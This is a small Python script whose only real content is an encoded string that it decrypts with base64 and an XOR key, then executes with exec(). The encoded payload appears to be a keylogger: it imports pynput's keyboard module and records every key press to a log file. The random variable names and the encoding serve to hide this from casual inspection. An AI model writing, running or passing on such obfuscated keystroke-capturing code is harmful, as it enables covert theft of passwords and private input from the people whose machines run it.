import base64
imRGEhJd = 9799
GAVyyDMv = 'baz'

def decrypt(code, key):
    decoded = base64.b64decode(code).decode()
    return ''.join([chr(ord(c) ^ key) for c in decoded])

exec(decrypt('DBgFB0oaEwQaHx5KAwcaBRgeSgEPEwgFCxgOYGAODwxKBQQ1GhgPGRlCAQ8TQ1BgSkpKSh4YE1BgSkpKSkpKSkodAx4CSgUaDwRCSAEPExlEBgUNSEZKSAtIQ0oLGUoMUGBKSkpKSkpKSkpKSkoMRB0YAx4PQgEPE0QJAgsYQ2BKSkpKDxIJDxoeSiseHhgDCB8eDy8YGAUYUGBKSkpKSkpKSh0DHgJKBRoPBEJIAQ8TGUQGBQ1IRkpIC0hDSgsZSgxQYEpKSkpKSkpKSkpKSgxEHRgDHg9CDEgxEQEPExc3SENgYA4PDEoZHgsYHjUGBQ0NDxhCQ1BgSkpKSh0DHgJKAQ8TCAULGA5EJgMZHg8EDxhCBQQ1GhgPGRlXBQQ1GhgPGRlDSgsZSgYDGR4PBA8YUGBKSkpKSkpKSgYDGR4PBA8YRAAFAwRCQ2BgGR4LGB41BgUNDQ8YQkNgYGBg', 106))